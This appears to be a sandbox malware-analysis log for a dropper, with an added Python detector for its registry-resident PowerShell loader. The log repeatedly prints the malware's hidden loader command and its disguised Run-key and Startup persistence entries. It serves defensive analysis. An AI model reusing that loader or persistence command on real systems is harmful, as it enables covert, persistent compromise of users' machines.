Source: C:\Windows\System32\netsh.exe Section loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: slc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpqec.dll
Source: C:\Windows\System32\netsh.exe Section loaded: qutil.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wevtapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wshelper.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ws2help.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: version.dll
Source: C:\Windows\System32\netsh.exe Section loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: bcrypt.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winipsec.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nci.dll
Source: C:\Windows\System32\netsh.exe Section loaded: devrtl.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: whhelper.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: webio.dll
Source: C:\Windows\System32\netsh.exe Section loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netshell.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rpcnsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exe Section loaded: atl.dll
Source: C:\Windows\System32\netsh.exe Section loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: onex.dll
Source: C:\Windows\System32\netsh.exe Section loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exe Section loaded: napmontr.dll
Source: C:\Windows\System32\netsh.exe Section loaded: certcli.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netapi32.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netutils.dll
Source: C:\Windows\System32\netsh.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\netsh.exe Section loaded: logoncli.dll
Source: C:\Windows\System32\netsh.exe Section loaded: activeds.dll
Source: C:\Windows\System32\netsh.exe Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: polstore.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ndfapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wdi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: secur32.dll
Source: C:\Windows\System32\netsh.exe Section loaded: tdh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wcnnetsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wlanapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wlanutil.dll
Source: C:\Windows\System32\netsh.exe Section loaded: p2pnetsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: p2p.dll
Source: C:\Windows\System32\netsh.exe Section loaded: p2pcollab.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wwancfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wwapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wlancfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wlanhlp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: peerdistsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rpcrtremote.dll
Source: C:\Windows\System32\netsh.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mprmsg.dll
Source: C:\Windows\System32\cmd.exe Section loaded: winbrand.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cscapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: wow64win.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: wow64cpu.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: devrtl.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: linkinfo.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ntshrui.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Section loaded: wow64win.dll
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Section loaded: wow64cpu.dll
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Section loaded: dwmapi.dll
Source: C:\Users\user\Desktop\._cache_1.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{35786D3C-B075-49B9-88DD-029876E11C01}\InProcServer32
Source: Microsoft.lnk.0.dr LNK file: ..\..\..\..\..\..\Local\Temp\x.exe
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: ._cache_1.exe Static file information: File size 1178304 > 1048576

Data Obfuscation

Source: 9.2.powershell.exe.2770000.0.raw.unpack, K4pNDLld8Rw0wdfmtZ.cs .Net Code: TH7j5ZAl9 System.Reflection.Assembly.Load(byte[])
Source: 9.2.powershell.exe.2db8ea0.1.raw.unpack, K4pNDLld8Rw0wdfmtZ.cs .Net Code: TH7j5ZAl9 System.Reflection.Assembly.Load(byte[])
Source: unknown Process created: "C:\Windows\System32\cmd.exe" /c start /min powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null)
Source: unknown Process created: "C:\Windows\System32\cmd.exe" /c start /min powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null)
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress, 0_2_0040EBD0
Source: x.exe.0.dr Static PE information: real checksum: 0xa961f should be: 0x12293c
Source: ._cache_1.exe Static PE information: real checksum: 0xa961f should be: 0x12293c
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_00416CB5 push ecx; ret 0_2_00416CC8
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00AE8AC5 push ecx; ret 1_2_00AE8AD8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_000007FE93D7022D push eax; iretd 4_2_000007FE93D70241
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_000007FE93D700BD pushad ; iretd 4_2_000007FE93D700C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_000007FE93D7245D push eax; iretd 4_2_000007FE93D72471
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_003AC590 push eax; retn 003Ah 12_2_003AC599
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_003C8AC5 push ecx; ret 12_2_003C8AD8
Source: 9.2.powershell.exe.2770000.0.raw.unpack, K4pNDLld8Rw0wdfmtZ.cs High entropy of concatenated method names: 'pFCMYGNqY', 'r4kYVPjGi', 'M6ftBDHZb', 'ywblfFXwp', 'Gpi7NbQNc', 'YASRYeyES', 'vfWIc4pND', 'od8NRw0wd', 'FmtAZa9H2', 'OAeWd0rmP'
Source: 9.2.powershell.exe.2770000.0.raw.unpack, A8v5UCNLAwXBSCX02v.cs High entropy of concatenated method names: 'ce4DmfsmSrOT856tDgfrkMb', 'VwBYpLi450', 'nEGw0M2gN8Uyq', 'HF4MQKv6J3', 'ItNMuY1NiO', 'MSaMqN1AXA', 'PcgMdHtN53', 'DI3MkE5MCW', 'xIpMedHv7k', 'rTtMjkwu5r'
Source: 9.2.powershell.exe.2db8ea0.1.raw.unpack, K4pNDLld8Rw0wdfmtZ.cs High entropy of concatenated method names: 'pFCMYGNqY', 'r4kYVPjGi', 'M6ftBDHZb', 'ywblfFXwp', 'Gpi7NbQNc', 'YASRYeyES', 'vfWIc4pND', 'od8NRw0wd', 'FmtAZa9H2', 'OAeWd0rmP'
Source: 9.2.powershell.exe.2db8ea0.1.raw.unpack, A8v5UCNLAwXBSCX02v.cs High entropy of concatenated method names: 'ce4DmfsmSrOT856tDgfrkMb', 'VwBYpLi450', 'nEGw0M2gN8Uyq', 'HF4MQKv6J3', 'ItNMuY1NiO', 'MSaMqN1AXA', 'PcgMdHtN53', 'DI3MkE5MCW', 'xIpMedHv7k', 'rTtMjkwu5r'
Source: C:\Users\user\Desktop\._cache_1.exe File created: C:\Users\user\AppData\Local\Temp\Tr.exe
Source: C:\Users\user\Desktop\._cache_1.exe File created: C:\Users\user\AppData\Local\Temp\x.exe

Boot Survival

Source: C:\Users\user\AppData\Local\Temp\Tr.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AdobeMX
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AdobeMX C:\Windows\System32\cmd.exe /c start /min powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null)
Source: C:\Users\user\Desktop\._cache_1.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.lnk
Source: C:\Users\user\Desktop\._cache_1.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.lnk
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AdobeMX
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AdobeMX
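The command line recorded under Data Obfuscation and written to the AdobeMX Run value above never puts a script on disk: PowerShell reads a string value named Valuex under HKCU:\Software, Base64-decodes it, loads the result as a .NET assembly and calls its entry point. The Python below is an added example, not part of this report or of the sandbox's tooling. It scores process command lines for that Base64 -> Assembly.Load -> EntryPoint.Invoke chain and checks whether a registry string value decodes to a PE image. All inputs are constructed to mirror the report's indicators (the AdobeMX value name, the Valuex property, a stub MZ/PE header standing in for the real payload); the three-indicator threshold is an assumed tuning value. On a live host the same functions would run over Sysmon or EDR process-creation events and over values read with Get-ItemProperty or reg query.

```python
"""Triage helpers for a registry-resident .NET loader.

Added example (not part of the sandbox report). Every input here is
constructed to mirror the report's indicators; on a real host the Run-key
commands and the HKCU:\\Software values come from telemetry, not literals.
"""
import base64
import binascii
import re
import struct
from typing import Dict, List, Optional

# Indicators taken from the command line in the report. Any one alone is
# noisy (many admin scripts use -ExecutionPolicy Bypass); the loader is
# flagged only when several co-occur.
INDICATORS = {
    "exec_policy_bypass": re.compile(r"-ExecutionPolicy\s+Bypass", re.I),
    "hidden_window": re.compile(r"-windowstyle\s+hidden", re.I),
    "base64_decode": re.compile(r"FromBase64String", re.I),
    "reflective_load": re.compile(r"\[System\.Reflection\.Assembly\]::Load\(", re.I),
    "registry_read": re.compile(r"Get-ItemProperty\s+HK(CU|LM):", re.I),
    "entrypoint_invoke": re.compile(r"\.EntryPoint\.Invoke\(", re.I),
}


def matched_indicators(cmdline: str) -> List[str]:
    """Names of all indicators present in one process command line."""
    return [name for name, rx in INDICATORS.items() if rx.search(cmdline)]


def is_registry_loader(cmdline: str, threshold: int = 3) -> bool:
    """Treat the command line as a registry-resident loader when at least
    `threshold` indicators co-occur (threshold is an assumed tuning value)."""
    return len(matched_indicators(cmdline)) >= threshold


def decode_registry_string(value: str) -> Optional[bytes]:
    """Strict Base64 decode of a REG_SZ value; None if it is not Base64."""
    try:
        return base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return None


def looks_like_pe(blob: bytes) -> bool:
    """True if the bytes start with an MZ header whose e_lfanew points at 'PE\\0\\0'."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    return blob[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def triage_run_keys(run_entries: Dict[str, str]) -> List[str]:
    """Names of Run-key values whose command matches the loader pattern."""
    return [name for name, cmd in run_entries.items() if is_registry_loader(cmd)]


def find_pe_values(reg_values: Dict[str, str]) -> List[str]:
    """Names of string values that Base64-decode to a PE image."""
    hits = []
    for name, value in reg_values.items():
        blob = decode_registry_string(value)
        if blob is not None and looks_like_pe(blob):
            hits.append(name)
    return hits


# --- constructed sample data (modelled on the report, not taken from it) ---
LOADER_CMD = (
    r"C:\Windows\System32\cmd.exe /c start /min powershell -ExecutionPolicy Bypass "
    r"-windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load("
    r"[System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex))"
    r".EntryPoint.Invoke($Null,$Null)"
)
BENIGN_CMD = r'"C:\Program Files\Vendor\Updater.exe" /silent'   # hypothetical
SAMPLE_RUN_KEYS = {"AdobeMX": LOADER_CMD, "VendorUpdater": BENIGN_CMD}


def build_fake_pe() -> bytes:
    """A minimal MZ/PE header stub standing in for the real .NET payload."""
    hdr = bytearray(b"MZ" + b"\x00" * 0x3E)   # 0x40-byte DOS header
    struct.pack_into("<I", hdr, 0x3C, 0x40)    # e_lfanew -> offset 0x40
    return bytes(hdr) + b"PE\x00\x00" + b"\x00" * 20


SAMPLE_HKCU_SOFTWARE = {
    "Valuex": base64.b64encode(build_fake_pe()).decode("ascii"),
    "Theme": "Aero Lite",                                   # not Base64
    "Note": base64.b64encode(b"just text").decode("ascii"), # Base64, not PE
}

if __name__ == "__main__":
    print("Run-key loaders:", triage_run_keys(SAMPLE_RUN_KEYS))
    print("PE-bearing values:", find_pe_values(SAMPLE_HKCU_SOFTWARE))
```

The only on-disk artifact of this persistence is the cmd.exe/powershell.exe command string in the Run value, so scanning the Run target as a file finds nothing; the payload has to be pulled out of the registry value itself, as find_pe_values does. Because the loader runs with -noexit, the powershell.exe host stays alive with the decoded assembly mapped, which is why the sandbox could carve it from process memory (the 9.2.powershell.exe.*.unpack entries above); a memory scan of long-lived powershell.exe processes is the complementary check on a live host.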
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_0047A330
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_00434418
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00AC4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 1_2_00AC4A35
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00B453DF IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 1_2_00B453DF
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_003A4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 12_2_003A4A35
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_004253DF IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 12_2_004253DF
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00AE3307 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_00AE3307
Source: C:\Users\user\Desktop\._cache_1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\._cache_1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\._cache_1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\._cache_1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\._cache_1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\._cache_1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\._cache_1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\._cache_1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\._cache_1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\._cache_1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\._cache_1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\._cache_1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\._cache_1.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
